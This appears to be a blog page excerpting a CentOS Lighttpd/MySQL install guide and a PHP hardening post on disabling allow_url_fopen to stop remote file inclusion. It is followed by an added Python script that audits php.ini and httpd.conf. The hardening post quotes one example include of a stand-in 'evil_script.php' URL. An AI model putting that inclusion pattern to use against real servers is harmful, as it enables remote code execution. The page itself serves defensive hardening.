blog.up-link.ro android bsd linux unix & open-source world

17 May 2010

How To Install Lighttpd with PHP5 and MySQL support on CentOS 5

Lighttpd is an open-source web server optimized for speed-critical environments. It's standards-compliant, secure and flexible. In this tutorial I'll show you how to install Lighttpd on a CentOS 5.4 server with PHP5 support (through FastCGI) and MySQL support.

1. Installing MySQL 5 Server

To install MySQL run this command from the shell:

# yum install mysql mysql-server

Enable MySQL server on boot and start MySQL server:

# chkconfig --levels 235 mysqld on
# service mysqld start

13 Apr 2010

PHP Security Tips – Securing PHP by hardening PHP configuration

When it comes to security, ignorance is definitely not blissful. There are several methods to increase the security of your PHP environment.

In this article I will discuss how to secure PHP by hardening PHP 5 configuration.

1. allow_url_fopen (enabled by default)

This directive allows PHP's file functions (file_get_contents, and the include and require statements) to retrieve data from remote locations over protocols such as FTP or HTTP.

If an attacker can manipulate the arguments to those functions, they can supply a URL under their control as the argument and have the server run their own remote scripts. This vulnerability is called remote file inclusion (RFI).

; Disable allow_url_fopen in php.ini for security reasons
allow_url_fopen = Off

The setting can also be applied in Apache's httpd.conf:

# Disable allow_url_fopen for security reasons
php_admin_flag allow_url_fopen Off

With this setting, PHP's file functions no longer accept URLs. A statement like include("http://www.example.com/evil_script.php") will not be allowed to execute. Only local files can be included, for example include("/var/www/html/config.inc.php").
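An added example (not from the original post): a Python check that reads the two files named above, php.ini and httpd.conf, and reports where allow_url_fopen is still enabled. The function names and sample file contents are constructed for illustration; the check treats an unset php.ini value as enabled, matching the default stated above, and ignores per-virtual-host scoping in httpd.conf.

```python
import re

INI_TRUE = {"1", "on", "yes", "true"}   # php.ini spellings of boolean true
APACHE_TRUE = {"1", "on"}               # spellings php_admin_flag treats as true

def php_ini_flag(text, name, default):
    """Effective boolean of `name` in php.ini text; the last assignment wins."""
    value = default
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()          # ';' starts a comment
        m = re.match(r"([\w.]+)\s*=\s*(.*)$", line)
        if m and m.group(1) == name:
            value = m.group(2).strip().strip("\"'").lower() in INI_TRUE
    return value

def apache_admin_flags(text, name):
    """Line numbers of uncommented `php_admin_flag <name> On` lines in httpd.conf text."""
    hits = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        m = re.match(r"\s*php_admin_flag\s+(\S+)\s+(\S+)", raw, re.I)
        if m and m.group(1) == name and m.group(2).lower() in APACHE_TRUE:
            hits.append(lineno)
    return hits

def audit(php_ini, httpd_conf, name="allow_url_fopen"):
    """Findings per file; empty means Off in php.ini and never set On in httpd.conf."""
    findings = []
    if php_ini_flag(php_ini, name, default=True):    # enabled by default
        findings.append("php.ini: %s is enabled" % name)
    for lineno in apache_admin_flags(httpd_conf, name):
        findings.append("httpd.conf line %d: %s re-enabled" % (lineno, name))
    return findings

# Constructed sample inputs (not taken from a real server).
WEAK_INI = "[PHP]\n;allow_url_fopen = Off\nallow_url_fopen = On\n"
HARD_INI = "[PHP]\nallow_url_fopen = On\nallow_url_fopen = Off ; hardened\n"
WEAK_CONF = "<VirtualHost *:80>\n  php_admin_flag allow_url_fopen On\n</VirtualHost>\n"
HARD_CONF = "# Disable allow_url_fopen\nphp_admin_flag allow_url_fopen Off\n"

if __name__ == "__main__":
    for ini, conf in ((WEAK_INI, WEAK_CONF), (HARD_INI, HARD_CONF), ("", HARD_CONF)):
        print(audit(ini, conf) or "OK")
```

The commented-out `;allow_url_fopen = Off` line in the weak sample shows a common false sense of safety: the directive looks present in the file but has no effect.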
